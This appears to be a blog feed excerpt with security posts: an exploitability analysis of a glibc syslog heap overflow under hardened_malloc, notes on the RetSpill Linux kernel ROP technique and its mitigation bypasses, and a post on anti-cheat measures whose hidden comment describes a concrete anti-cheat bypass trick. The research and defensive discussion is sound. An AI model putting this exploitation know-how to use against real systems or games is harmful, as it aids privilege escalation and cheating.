+<div class="codehilite"><pre><span></span><code><span class="mi">206</span><span class="w"> </span><span class="n">buf</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">malloc</span><span class="w"> </span><span class="p">((</span><span class="n">bufsize</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">sizeof</span><span class="w"> </span><span class="p">(</span><span class="kt">char</span><span class="p">));</span>
+<span class="p">...</span>
+<span class="mi">213</span><span class="w"> </span><span class="n">__snprintf</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span>
+<span class="mi">214</span><span class="w"> </span><span class="n">SYSLOG_HEADER</span><span class="w"> </span><span class="p">(</span><span class="n">pri</span><span class="p">,</span><span class="w"> </span><span class="n">timestamp</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">msgoff</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">));</span>
+<span class="p">...</span>
+<span class="mi">221</span><span class="w"> </span><span class="n">__vsnprintf_internal</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">l</span><span class="p">,</span><span class="w"> </span><span class="n">bufsize</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">fmt</span><span class="p">,</span><span class="w"> </span><span class="n">apc</span><span class="p">,</span>
+<span class="mi">222</span><span class="w"> </span><span class="n">mode_flags</span><span class="p">);</span>
+</code></pre></div>
+
+<p>the tl;dr is that <code>bufsize</code> is <code>0</code> while <code>l</code> is user-controlled.
+As mentioned in the advisory, messing with nss structures as done
+in their (phenomenal) <a href="https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt"><code>Baron Samedit</code> sudo
+exploit</a>
+is a good way to get a root shell on the glibc.</p>
+<p>While the bug is in glibc's <code>syslog</code>, it's not unheard of for
+people to run custom allocators for performance/security/speed/… reasons.
+One of those could be, for example, <a href="https://github.com/GrapheneOS/hardened_malloc">hardened_malloc</a>,
+<a href="https://grapheneos.org">GrapheneOS</a>'s security-focused allocator, raising
+the question "would <code>hardened_malloc</code> make this particular bug
+unexploitable on my x86_64 Debian machine?"</p>
+<p>After discussing this with friends, we don't <em>think</em> that it makes
+the bug completely unexploitable, but ridiculously complicated, which is good
+enough™ for me. But keep in mind that this "analysis" was done hastily at 2am,
+so caveat lector.</p>
+<p><code>hardened_malloc</code> uses size-based slabs isolation, popularised by
+<a href="https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/PartitionAlloc.md">PartitionAlloc</a>.
+Since <code>bufsize</code> is zero, this is a 1-byte
+allocation, falling into the
+<a href="https://github.com/GrapheneOS/hardened_malloc/blob/main/h_malloc.c#L147">16 bytes size-class</a>,
+the smallest after the special <code>0</code> one. So to exploit this, one would have to find an
+interesting object of size 16 bytes or lower to overwrite. But since
+canaries are enabled by default, this becomes even more difficult: sizes of
+allocations are actually bumped by 8 bytes, meaning that one would actually
+have to find an interesting object of size 8 bytes or lower.</p>
+<p>Moreover, 16-byte slabs can contain at most 256 allocations, and are
+surrounded by guard pages, meaning that accessing anything below <code>buf</code> and
+above <code>buf+(256*16)</code> will result in a crash.</p>
+<p>Allocations are randomized, which might help for bruteforcing the heap layout:
+if the current one isn't exploitable, just crash and start again. But it will
+also result in a lot more crashes, since <code>buf</code> might be allocated closer to
+the guard page.</p>
+<p>There are of course other mitigations, but they aren't relevant in this
+particular case, like canaries that are checked on <code>free</code>,
+or <a href="https://community.arm.com/arm-community-blogs/b/architectures-and-processors-blog/posts/enhanced-security-through-mte">ARM's MTE</a> that completely kills linear-overflows.</p>
+<p>Given the ludicrous amount of randomization <code>hardened_malloc</code> applies to heap bases (32G
+per region), bruteforcing offsets of anything not on the heap is futile.
+So one would have to find something interesting in an object of 8 bytes or less on
+the heap, like a path to corrupt as in <code>service_user</code>,
+or some partial-overwrite of a function-pointer to call a
+<a href="https://david942j.blogspot.com/2017/02/project-one-gadget-in-glibc.html">one-shot-gadget</a>, …</p>
+<p>Thanks to <code>strcat</code> for the handholding, and
+to <code>jdoe</code>, <code>drvink</code> and <code>J</code> for their diligent proofreading,</p>Paper notes: RetSpill2024-01-18T16:45:00+01:002024-01-18T16:45:00+01:00jvoisintag:dustri.org,2024-01-18:/b/paper-notes-retspill.html<ul>
+<li>Full title: RetSpill: Igniting User-Controlled Data to Burn Away Linux Kernel Protections</li>
+<li>PDF: <a href="https://dl.acm.org/doi/10.1145/3576915.3623220">ACM</a> —
+ <a href="https://kylebot.net/papers/retspill.pdf">mirror</a> —
+ <a href="https://dustri.org/b/files/papers/retspill.pdf">local mirror</a></li>
+<li>Authors: <a href="https://kylebot.net/">Kyle "kylebot" Zeng</a>,
+ <a href="https://ruoyuwang.me/">Ruoyu Wang</a>,
+ <a href="https://yancomm.net/">Yan Shoshitaishvili</a>,
+ and <a href="https://adamdoupe.com/">Adam Doupé</a> from <a href="https://shellphish.net/">Shellphish</a>,
+ along with <a href="https://zplin.me/">Zhenpeng Lin</a>,
+ <a href="https://www-users.cse.umn.edu/~kjlu/">Kangjie Lu</a>,
+ <a href="http://xinyuxing.org/">Xinyu Xing</a> and
+ <a href="https://www.tiffanybao.com/">Tiffany Bao</a>.</li>
+</ul>
+<p>The idea of the paper is to use user-controlled …</p><ul>
+<li>Full title: RetSpill: Igniting User-Controlled Data to Burn Away Linux Kernel Protections</li>
+<li>PDF: <a href="https://dl.acm.org/doi/10.1145/3576915.3623220">ACM</a> —
+ <a href="https://kylebot.net/papers/retspill.pdf">mirror</a> —
+ <a href="https://dustri.org/b/files/papers/retspill.pdf">local mirror</a></li>
+<li>Authors: <a href="https://kylebot.net/">Kyle "kylebot" Zeng</a>,
+ <a href="https://ruoyuwang.me/">Ruoyu Wang</a>,
+ <a href="https://yancomm.net/">Yan Shoshitaishvili</a>,
+ and <a href="https://adamdoupe.com/">Adam Doupé</a> from <a href="https://shellphish.net/">Shellphish</a>,
+ along with <a href="https://zplin.me/">Zhenpeng Lin</a>,
+ <a href="https://www-users.cse.umn.edu/~kjlu/">Kangjie Lu</a>,
+ <a href="http://xinyuxing.org/">Xinyu Xing</a> and
+ <a href="https://www.tiffanybao.com/">Tiffany Bao</a>.</li>
+</ul>
+<p>The idea of the paper is to use user-controlled data that are by design copied
+in kernel-land when exercising syscalls to store a <a href="https://en.wikipedia.org/wiki/Return-oriented_programming">ROP</a>-chain, via 4 main venues:</p>
+<ul>
+<li>Valid Data directly copied onto the kernel stack for performance reasons, like when
+ calling <code>poll</code>;</li>
+<li>Preserved Registers, restored upon returning from kernel-land to
+ userland. </li>
+<li>Calling Convention compliant functions will save/restore registers, and
+ apparently, system call handlers are calling convention compliant
+ even though the kernel is already taking care of those,
+ and syscalls can <a href="https://www.kernel.org/doc/html/latest/process/adding-syscalls.html?highlight=syscall_define#do-not-call-system-calls-in-the-kernel">only be called from userland</a>.
+ But even if the syscalls handles weren't compliant, registers still contain
+ userland values when they're called, and sub-functions might store/restore
+ those registers, since those do need to be compliant.</li>
+<li>Uninitialized Memory, since the per-thread kernel stack is reused between syscalls,
+ and not erased (unless <code>PAX_MEMORY_STACKLEAK</code> is used).</li>
+</ul>
+<p>Then, only a <a href="https://en.wikipedia.org/wiki/KASLR">KASLR</a> leak,
+a CFHP (control-flow hijacking primitive)
+and a <code>add rsp, X; ret</code>-like gadget are required to <a href="https://www.youtube.com/watch?v=FoUWHfh733Y">ROP all the things</a>.
+Nowadays, most™ CFHP are created by corrupting the heap to hijack function
+pointers, and since every kernel thread shares the same heap,
+once it is is properly shaped, the control flow hijacking primitive can likely
+be triggered again and again from a different threads.
+Moreover, changing the exploit is simply a matter of re-invoking a syscall with
+different data spill, instead of having to reshape the heap every single time.
+One doesn't have to worry about crashes (enabling lame bruteforcing), since no
+major Linux distributions (except CentOS, kudos) has <code>panic_on_oops</code> enabled,
+so having a ROP-chain crash is no big deal, because the CFHP is still on the
+heap, one syscall away.</p>
+<p>Since the space afforded to store gadgets might be too small, one trick is to
+invoke <code>do_task_dead</code> at the end of every ROP-chain to terminate it gracefully,
+and trigger the CFHP again and again.</p>
+<p>Mitigation-wise: </p>
+<ul>
+<li><a href="https://en.wikipedia.org/wiki/Control_register#SMEP">SMEP</a>,
+ <a href="https://en.wikipedia.org/wiki/Supervisor_Mode_Access_Prevention">SMAP</a> and
+ <a href="https://en.wikipedia.org/wiki/Kernel_page-table_isolation">KPTI</a> are irrelevant.</li>
+<li><a href="https://pax.grsecurity.net/docs/randkstack.txt">RANDKSTACK</a> mitigates data spillage from Preserved Registers and Uninitialized Memory,
+ but since it only provides 5 bits of randomness, a <code>ret</code>-sled is enough
+ to bypass it (25.44% of the time if using gadgets from Preserved Registers or Uninitialized Memory, 100% otherwise),
+ and in the absence of <code>panic_on_oops</code> it can quickly be bruteforced anyway.</li>
+<li><a href="https://en.wikibooks.org/wiki/Grsecurity/Appendix/Grsecurity_and_PaX_Configuration_Options#Sanitize_kernel_stack">STACKLEAK</a>,
+ <a href="https://en.wikibooks.org/wiki/Grsecurity/Appendix/Grsecurity_and_PaX_Configuration_Options#Forcibly_initialize_local_variables_copied_to_userland">STRUCTLEAK</a>,
+ and <a href="https://lwn.net/Articles/823152/">CONFIG_INIT_STACK_*</a>
+ only mitigate data spillage from Uninitialized Memory.</li>
+<li><a href="https://lwn.net/Articles/824307/">FG-KASLR</a> is <a href="https://lkmidas.github.io/posts/20210205-linux-kernel-pwn-part-3/#gathering-useful-gadgets">useless</a>
+ since it doesn't randomize everything, leaving a couple (<code>42631</code> according to
+ the paper) of gadgets at position-invariant positions, which are enough to perform
+ arbitrary-reads and derandomize everything.</li>
+<li><a href="https://lore.kernel.org/lkml/202210010918.4918F847C4@keescook/T/#u">KCFI</a>
+ and <a href="https://www.intel.com/content/www/us/en/developer/articles/technical/technical-look-control-flow-enforcement-technology.html">IBT</a>
+ also (currently) don't cover everything, but don't really matter much here
+ anyway, since we only care about backward-edges, and as for the CFHP:</li>
+<li>There <a href="https://i.blackhat.com/USA-22/Wednesday/US-22-Jin-Monitoring-Surveillance-Vendors.pdf#page=35">are ways</a>
+ to obtain one in the presence of perfect forward-edge CFI with a heap corruption.</li>
+<li>Using <code>__x86_indirect_thunk_rdi</code> allows to transform a forward-edge control-flow transition to backward edge one.</li>
+<li>Shadow stack and perfect CFI are a pipe dream that would mitigate RetSpill,
+ but <a href="https://pax.grsecurity.net/docs/PaXTeam-H2HC15-RAP-RIP-ROP.pdf">PaX' RAP</a>
+ is really close to it, likely making it insanely hard, with its type-based
+ CFI, and its changing-on-every-syscall/task/… register-stored cookie paired
+ with unreadable kernel stacks for backward edge, on top of CFI.</li>
+</ul>
+<p>To showcase how cool all of this is, the paper comes with a semi-automated tool
+outputting the address of a stack-shifting gadget, a function to performs data
+spillage, invoke the triggering system call, and yield a root shell via a
+classic <code>commit_creds(init_cred)</code> + returning back to user space. It works by:</p>
+<ul>
+<li>taking full snapshots of a vm to locate the syscall leading to CFHP by using
+ a binary-search-like heuristic;</li>
+<li>mutating userland inputs (registers, <code>copy\_from\_user</code>/<code>get\_user</code>
+ parameters, …), continuing the execution of the vm,
+ marking the as user-controllable data if the CFHP still
+ happens after modifications, and doing taint analysis to find how to modify
+ them.</li>
+<li>generating a ROP-chain, which isn't that easy, given that:</li>
+<li>it's done over discrete controlled regions</li>
+<li>there are some constraints, like "<code>eax</code> contains the syscall number",
+ or "<code>edx</code> comes from both <em>Saved Registers</em> and <em>Calling Convention</em>
+ spillages.</li>
+</ul>
+<p>Of course, given that some authors are <a href="https://angr.io/">angr</a> developers,
+<a href="https://github.com/angr/angrop">angrop</a> was used to knit the ROP-chains, and
+the results are pretty impressive:</p>
+<blockquote>
+<p>The abundance of data spillage allows 20 out of 22 proof-of-concept programs
+that manifest CFHP to be semi-automatically turned into full privilege escalation exploits.</p>
+</blockquote>
+<p>To kill this technique, the authors suggest:</p>
+<ol>
+<li><em>Preserved Register</em>: <code>RANDKSTACK</code> helps, but storing userspace registers
+ somewhere else than on the stack would be even better, eg. in <code>task_struct</code>.</li>
+<li><em>Uninitialized Memory</em>: enable <code>STACKLEAK</code>/<code>STRUCTLEAK</code>/<code>CONFIG\_INIT\_STACK\_\*</code>,
+ but the performances impact is pretty steep.</li>
+<li><em>Calling Convention</em> and <em>Valid Data</em>: an improved version of <code>RANDKSTACK</code>,
+ adding a random offset at the bottom of each stack frame, between <code>rsp</code> and user data.
+ This technique also mitigates Preserved Registers and Uninitialized Memory,
+ with an average performance overhead of 0.61%.</li>
+</ol>
+<p>Like all good papers it comes <a href="https://github.com/sefcom/RetSpill">with code</a>.</p>
+<p>Amusingly:</p>
+<ul>
+<li>RetSpill completely bypasses OpenBSD's
+ <a href="https://isopenbsdsecu.re/mitigations/map_stack/">MAP_STACK</a> mitigation,
+ should it ever be implemented in kernel-land, </li>
+<li>The <a href="https://org.anize.rs/">Organizers</a> CTF team
+ <a href="https://org.anize.rs/0CTF-2021-finals/pwn/kernote">used</a>
+ the <a href="https://elixir.bootlin.com/linux/latest/ident/pt_regs"><code>ptregs</code></a> structure
+ to store their ROP chain for <a href="https://ctftime.org/event/1357">0CTF/TCTF 2021
+ Finals</a>'s
+ <a href="https://ctftime.org/task/17461">Kernote</a> pwn challenge.</li>
+</ul>On non-technical video-games cheat mitigations2024-01-12T20:15:00+01:002024-01-12T20:15:00+01:00jvoisintag:dustri.org,2024-01-12:/b/on-non-technical-video-games-cheat-mitigations.html<p>Cheats are as old as video games, and will be there as long. There
+are a couple of high-profile players in the anti-cheat market today:
+<a href="https://en.wikipedia.org/wiki/BattlEye">BattlEye</a>,
+<a href="https://en.wikipedia.org/wiki/Valve_Anti-Cheat">Valve's VAC</a>,
+<a href="https://en.wikipedia.org/wiki/PunkBuster">PunkBuster</a>,
+<a href="https://easy.ac/en-us/">Epic's EAC</a>,
+<a href="https://wowpedia.fandom.com/wiki/Warden_(software)">Blizzard's Warden</a>,
+<a href="https://support-valorant.riotgames.com/hc/en-us/articles/360046160933-What-is-Vanguard-">Riot's Vanguard</a>,
+<a href="https://callofduty.com/en/warzone/ricochet">Activision's Ricochet</a>,
+… as well as in-house ones.</p>
+<p>To try to keep up in the race …</p><p>Cheats are as old as video games, and will be there as long. There
+are a couple of high-profile players in the anti-cheat market today:
+<a href="https://en.wikipedia.org/wiki/BattlEye">BattlEye</a>,
+<a href="https://en.wikipedia.org/wiki/Valve_Anti-Cheat">Valve's VAC</a>,
+<a href="https://en.wikipedia.org/wiki/PunkBuster">PunkBuster</a>,
+<a href="https://easy.ac/en-us/">Epic's EAC</a>,
+<a href="https://wowpedia.fandom.com/wiki/Warden_(software)">Blizzard's Warden</a>,
+<a href="https://support-valorant.riotgames.com/hc/en-us/articles/360046160933-What-is-Vanguard-">Riot's Vanguard</a>,
+<a href="https://callofduty.com/en/warzone/ricochet">Activision's Ricochet</a>,
+… as well as in-house ones.</p>
+<p>To try to keep up in the race, both sides are resorting to more and more invasive
+technical privacy-invasive measures: streaming virtualised shellcodes,
+hardware fingerprinting and locking,
+<a href="https://secret.club/2020/01/05/battleye-stack-walking.html">stack-walking</a>,
+bootkit-like kernel drivers,
+<a href="https://en.wikipedia.org/wiki/Trusted_Platform_Module">TPM</a>/
+secure boot/
+<a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/bringup/device-guard-and-credential-guard">HVCI</a>/
+<a href="https://en.wikipedia.org/wiki/Input%E2%80%93output_memory_management_unit">IOMMU</a>/
+<a href="https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs">VBS</a>/…
+<a href="https://support-valorant.riotgames.com/hc/en-us/articles/22291331362067-Vanguard-Restrictions">shenanigans</a>,
+hypervisors <a href="https://secret.club/2020/04/13/how-anti-cheats-detect-system-emulation.html">detection</a>/usage,
+<a href="https://secret.club/2020/03/31/battleye-developer-tracking.html">exfiltration of suspicious materials</a>,
+external <a href="https://en.wikipedia.org/wiki/Direct_memory_access">DMA</a> hardware,
+or other <a href="https://dustri.org/b/paper-notes-reversing-anti-cheats-detection-generation-cycle-with-configurable-hallucinations.html">more exotic things</a>.</p>
+<p>Yet anti-cheats are still routinely bypassed, less in a public manner, granted, but private
+and closed-community cheats are still flourishing, since it's a losing game by
+nature. And since games and anti-cheats are software, they're of course riddled
+with <a href="https://vice.com/en/article/d7y5wj/street-fighter-v-rootkit">hilarious</a> bugs leading to
+<a href="https://unknowncheats.me/forum/anti-cheat-bypass/614682-eac-dll-loading-method-eac-forcer.html">stupid</a>
+<a href="https://unknowncheats.me/forum/anti-cheat-bypass/503052-easy-anti-cheat-kernel-packet-fucker.html">bypasses</a>.</p>
+<p>But this isn't what this blogpost is about. Nowadays, cheats are considered as
+part of a larger problem: abuses and toxicity. Cheats aren't (only) hunted down
+because they're morally questionable, but because they disturb the way the game is meant to be
+enjoyed. Toxic and abusive behaviours lead to the very same results:
+A game that isn't fun to play because of cheating/abuse/toxicity issues will see its
+players number decrease, have poor reviews, … and won't make money. I'm sure
+there is a parallel to be made about the current state of our society, but I
+digress.</p>
+<p>For this article, we'll consider cheating and abuse/toxicity
+as a single issue under the term <em>abuse</em>.
+Now, because abuse isn't a purely technical issue, but also a social one, it
+can't be solved by technical solutions only, so let's have
+a look at what non-technical mitigations game developers are
+coming up with to curb this issue.</p>
+<p>The most obvious mitigation is to make cheating expensive, money wise.
+Having to pay 60EUR for a game is a steep investment, especially if one
+has to buy it again every time they get banned. This of course doesn't
+apply for free-to-play games, but can be emulated by having a cosmetics
+ecosystem, either to pay for, or to grind. The other expensive thing when
+playing video games is the hardware, and bans can be tied to it.</p>
+<h2>Global measures</h2>
+<p>The <em>big</em> mitigation at this level is reputation systems. They're based on
+people who know best how a fun and fair game should go: players. After a
+match, they're encouraged to cast votes on how fair it was, on a match level,
+but also directly at players level: "Bob was really looking out for others",
+"Bob was a team player", and so on. For negative behaviour, reports don't have
+to wait the end of the match, players can report
+cheating, being offensive in the text/voice chat, <a href="https://en.wikipedia.org/wiki/Griefer">griefing</a>,
+queue dodging, <a href="https://www.urbandictionary.com/define.php?term=smurfing">smurfing</a>, …
+Of course, slanderous reports are penalised.</p>
+<p>Peer pressure is a good lever too, by taking action not only against cheaters,
+but from people benefiting from the cheat, like regular teammates.</p>
+<p><a href="https://en.wikipedia.org/wiki/Bug_bounty_program">Bug bounty programs</a> are now commonplace,
+so it's only logical that there are now <a href="https://hackerone.com/riot">some</a>
+rewarding anti-cheat bypasses/exploits. The rewards are a bit cheap for now,
+but will likely rise up as the programs mature. The positive effects are
+multiples:</p>
+<ol>
+<li>It increases the incentives to report issues to get them fixed: a player
+ finding a glitch/exploit can now get some cash for the discovery</li>
+<li>As more abuse vectors are killed, the reward prices will rise, and it might
+ become more profitable to report bugs than to sell them to cheat providers.
+ This isn't unheard of, with <a href="https://google.github.io/security-research/kernelctf/rules.html">Google's
+ kernelCTF</a>
+ paying two times more than Zerodium.</li>
+<li>If the bug bounty program is correctly managed, the probability of getting a
+ given amount of money for reporting an issue will be higher than using it in
+ a cheat for an unknown period of time until it gets fixed.</li>
+<li>It will likely increase the amount of people looking for issues and willing
+ to report them.</li>
+</ol>
+<p>Community managers can also regularly <s>spread <a href="https://en.wikipedia.org/wiki/Fear,_uncertainty,_and_doubt">FUD</a></s>
+post updates about ban waves, anti-cheat measures, reports, … to make it
+clear that abusive behaviours are something being taken care of,
+and a dangerous gamble for players to take part in. I think
+I have seen some people spending time proving that some cheaters streaming live
+were in fact recycled pre-recorded footage from an earlier version of game,
+because some of the game details have been updated in the meantime.</p>
+<h2>Accounts-level measures</h2>
+<p>Some game stores, like <a href="https://en.wikipedia.org/wiki/Steam_(service)">Steam</a>,
+have an account-level "cheater" mark, meaning that if someone gets banned from a game for cheating,
+other games can know about it. But more importantly,
+<a href="https://en.wikipedia.org/wiki/Achievement_(video_games)">achievements</a>
+and cosmetics are also tied to an account, and as mentioned previously,
+those are non-zero time and/or money investments. Getting banned means losing
+them. This of course only deters opportunistic cheaters,
+as people can simply create other accounts to cheat, but this can be made
+harder via purely technical means.</p>
+<p>Most <em>competitive</em> online games have ranked and casual game modes, with the
+former being only accessible after having spent a certain amount of time in the
+latter one. Meaning that one has to do it again every time they get banned,
+or <a href="https://en.wikipedia.org/wiki/Boosting_(video_games)">pay someone to do it</a>.
+Some studios are even making player go through more hoops to be able to play, like requiring
+<a href="https://en.wikipedia.org/wiki/Multi-factor_authentication">MFA</a>,
+or playing a couple of matches against <a href="https://en.wikipedia.org/wiki/Video_game_bot">bots</a>
+branded as a tutorial, before being able to play with other people. There is a
+course a fine balance to keep to annoy abusers but not legitimate players.</p>
+<h2>Player-level measures</h2>
+<p>The goal of non-technical measures isn't to make it impossible to be abusive,
+but to make it not worth it. Moreover, issuing instahwpermabans to <a href="https://en.wikipedia.org/wiki/Edgelord">edgelords</a>
+seems a tad heavy-handed, so having a large panel of measures against abuser makes sense:
+one might want to allow people to rectify their behaviour, to isolate them to
+cool down, and so on. It might include textual warnings, temporary bans, kick
+from the current game, chat/voice mute, losing access to ranked play,
+reducing the amount of earned experience points, …</p>
+<p>Players are abusive for various reasons, but I'd argue that most do because
+it's fun. Ruining the fun for them is thus a good way to curb such behaviours.
+A simple way to do this is to make them play together, by grouping players
+by reputation, or by having servers with technical anti-cheat measures
+explicitly disabled. But there are even more creative measures,
+like <a href="https://www.callofduty.com/en/blog/2023/11/call-of-duty-ricochet-anti-cheat-modern-warfare-III-progress-report">disabling their parachute</a>,
+reducing their damage output to ridiculous levels, taking away their weapons,
+<a href="https://www.callofduty.com/blog/2023/06/call-of-duty-ricochet-anti-cheat-season-04-update">making other legitimate players invisible to them</a>,
+randomly drop some of their inputs,
+<a href="https://dustri.org/b/paper-notes-reversing-anti-cheats-detection-generation-cycle-with-configurable-hallucinations.html">hallucinations</a>, … and
+while this costs a bit more engineering time than simply grouping them
+together, it has a couple of high-value returns on investment:
+- allowing game developers to spend more time collecting data on how cheats are working on a technical level,
+- reducing the impact cheaters have on a game make is possible to
+ significantly defer banning them without impacting other players too much,
+ making it harder for cheat makers to pinpoint how and why a cheat was
+ detected.
+- it's absolutely hilarious</p>
+<h2>Examples</h2>
+<h3><a href="https://en.wikipedia.org/wiki/Tom_Clancy's_Rainbow_Six_Siege">Rainbow Six Siege</a></h3>
+<ul>
+<li>It uses BattlEye, and in end-2022 early 2023 banned around
+ <a href="https://ubisoft.com/en-us/game/rainbow-six/siege/news-updates/2g7hT2NNuOqrj35RfgsFxN/anticheat-status-update-march-2023">5000</a>
+ accounts per month, which is a lot, but also shows that it doesn't deter
+ cheaters.</li>
+<li>The game costs <a href="https://store.steampowered.com/app/359550/Tom_Clancys_Rainbow_Six_Siege/">$8</a>,
+ but if you want to have access to all the operators, it's $70. One can also
+ unlock operators by playing, which takes several hundreds of hours.</li>
+<li>To play ranked, one need to reach <a href="https://ubisoft.com/en-gb/game/rainbow-six/siege/news-updates/4hShcX2HZTG2ttIi3IIN9Y/matchmaking-rating">level 50</a>,
+ which takes around 50h, give or takes.</li>
+<li>The game has a rich ecosystem of cosmetics
+ than can be <a href="https://store.ubisoft.com/us/dlc-type-skins-cosmetics">purchased for steep prices</a>,
+ and painstakingly earned by playing,
+ that would be lost in cast of an account ban.</li>
+<li>Friendly fire will result in the damages being applied to the shoot
+ should it be reported as voluntary by the player at the receiving end.</li>
+<li>It's developing a pretty involved <a href="https://ubisoft.com/en-gb/game/rainbow-six/siege/news-updates/22JLMFeayzuamhb7YKbAjm/reputation-system-activation-more">reputation system</a>,
+ where people with a "positive" behaviour gets rewarded (more experience
+ points, cosmetics, …), while those with a "negative" one
+ might be prevented from playing <em>ranked</em>,
+ get less experience points,
+ …</li>
+</ul>
+<h3><a href="https://en.wikipedia.org/wiki/Call_of_Duty:_Modern_Warfare_II_(2022_video_game)">Call of Duty: Modern Warfare II</a>:</h3>
+<ul>
+<li>The game costs <a href="https://store.steampowered.com/app/1962660/Call_of_Duty_Modern_Warfare_II/">$70</a>.</li>
+<li><a href="https://callofduty.com/blog/2023/02/call-of-duty-modern-warfare-II-ranked-play-features-challenges-rewards">"Players must be at least Level 16 to access Ranked Play"</a>,
+ but this can be done in a couple of hours.</li>
+<li>Cheating results in account-wise permaban across all Call of Duty titles.</li>
+<li>Banned accounts have their records purged from leaderboards.</li>
+<li>Players engaging in "negative" behaviours might get
+ muted on chat/voice, … and interestingly, cheaters
+ are going to get paired with other cheaters in matchmaking.
+ <a href="https://support.activision.com/articles/call-of-duty-security-and-enforcement-policy">Players who are often playing with the same cheaters</a> (boosting),
+ will also get their reputation tanked.</li>
+</ul>
+<h3><a href="https://playvalorant.com/">Valorant</a></h3>
+<p>Its developer even published a
+<a href="https://playvalorant.com/en-us/news/tags/game-health-series/">great series of blopost</a> on
+what it calls "game health"</p>
+<ul>
+<li>The game is free-to-play, but comes with <em>a lot</em> of <a href="https://valorantstrike.com/valorant-store/">cosmetics</a>.</li>
+<li>Cheaters get a permaban, but people benefiting from them might get a 6 months one as well.</li>
+<li>Players joining games and <a href="https://playvalorant.com/en-gb/news/dev/valorant-behavior-detection-and-penalty-updates/">idling to reap out experience points</a>,
+ doing nothing but kneecapping their team will <a href="https://playvalorant.com/en-us/news/dev/valorant-systems-health-series-afk/">get penalised</a>.</li>
+<li>Players are encouraged to report toxic behaviours, and to not engage,
+ since engagement might be penalized as well</li>
+<li>Players using,
+ <a href="https://support-valorant.riotgames.com/hc/en-us/articles/360044791253-Inappropriate-In-Game-Names">certain words</a>
+ whether in chat or as username,
+ will be flagged as toxic.</li>
+<li>Penalties come in various size, shapes and durations, allowing to fine tune
+ according to behaviour: warnings, voice/chat restrictions,
+ reduction in experience points
+ gain, reduction in raked rating, increased queue waiting time, ranking game
+ ban, global ban.</li>
+<li>Valorant <a href="https://playvalorant.com/en-us/news/dev/valorant-systems-health-series-smurf-detection/">published</a>
+ their approach to mitigate smurfing; acknowledging that while having multiple accounts
+ to smurf/trade/evade bans/… is not desirable, some people are using
+ them to to play with friends with a better/worse ranked level.
+ So while they took measures to detect and mitigate having multi-accounts,
+ they also relaxed the maximum ranks difference for players to play together,
+ which significantly reduced the number of alt-accounts usage,
+ but also didn't alter match fairness in a measurable way.</li>
+</ul>
+<h2>Conclusion</h2>
+<p>This is all nice and dandy, but is it working? According to
+data from <a href="https://www.ubisoft.com/en-us/game/rainbow-six/siege/player-protection">Rainbow Six Siege</a>:
+<a href="https://playvalorant.com/en-us/news/tags/game-health-series/">Valorant</a>,
+<a href="https://www.callofduty.com/blog/2023/06/call-of-duty-ricochet-anti-cheat-season-04-update">Call of Duty: Modern Warfare 2</a>,
+… those measures are indeed working pretty well,
+and are likely providing better results than technical-only
+measures. They are also cheaper, since steering people away from toxic
+behaviours doesn't reduce the number of players as much as banning them
+outright. It's nice to see that the video game industry realised that cheating and
+abuses/toxicity could be addressed in similar non-technical ways, and that both
+approaches are complementary. This is a stark contrast to other ones,
+where techno-solutionism is seen at the only possible remedy, even more so
+in our machine-learning-all-the-things era. </p>
+<h2>Sources and resources</h2>
+<ul>
+<li><a href="https://youtube.com/watch?v=hI7V60r7Jco">Anti-Cheat for Multiplayer Games</a></li>
+<li><a href="https://secret.club/">Secret Club</a></li>
+<li><a href="https://unknowncheats.me/">UnKnoWnCheaTs</a></li>
+</ul>
+<!--
+
+Steam's VAC was already doing basic stuff, like hashing the entire code region of the game on launch, storing the hash, and then re-hashing the code region every few minutes to see if someone had changed the code, presumably to install a trampoline and hook into the game's functions (to write aimbots, wallhacks, etc). When a hash change is detected, the player is banned.
+
+Cheaters found a way to bypass this by simply finding the function they desired to hook and setting any random function pointer within it to 0 (stored in rw memory, so doesn't trigger the code region hash mentioned above). This would trigger an exception, which the cheat developer would catch with Windows' SEH/VEH, effectively giving them a hook into the function without having to modify the code region.
+
+Activision's anti-cheat would then go through a bunch of function pointers (the ones in network/rendering functions mostly, since that's where you'd want to hook to write cheats) and check for null pointers. If a pointer was null, they'd ban you.
+
+Funny enough, this was incredibly easy to bypass: just set the pointer to 1, or 2, or 3, or ...!! All of these addresses are most likely still invalid and they'll still trigger an exception, even though they're theoretically valid pointers, giving you a de-facto hook into the game that bypassed both VAC and BO2's anticheat, and was pretty much unpatchable. Perhaps that's why they started being annoying and banning people for running IDA, Cheat Engine, etc., which are certainly probable indicators but definitely not hard evidence for cheats.
+
+-->2023 in retrospect2023-12-31T23:59:00+01:002023-12-31T23:59:00+01:00jvoisintag:dustri.org,2023-12-31:/b/2023-in-retrospect.html<p>In 2023, I did, amongst other things:</p>
+<ul>
+<li>Donated some money:<ul>
+<li>$400 to <a href="https://fsfe.org/">FSFE</a></li>
+<li>$5000 to <a href="https://noyb.eu">NOYB</a></li>
+<li>$5000 to <a href="https://riseup.net">Riseup</a></li>
+<li>$5000 to the <a href="https://archive.org">Internet Archive</a></li>
+<li>$5000 to the <a href="https://en.wikipedia.org/wiki/Planned_Parenthood">Planned Parenthood Federation of America</a></li>
+<li>$1000 to <a href="https://daysforgirls.org">days for girls</a>, on the advice of <a href="https://foreignbystander.com/">chik</a> from <a href="https://darkscience.net">darkscience</a>.</li>
+<li>$200 each, as a <a href="https://opensource.googleblog.com/search/label/peer%20bonus">Open Source …</a></li></ul></li></ul><p>In 2023, I did, amongst other things:</p>
+<ul>
+<li>Donated some money:<ul>
+<li>$400 to <a href="https://fsfe.org/">FSFE</a></li>
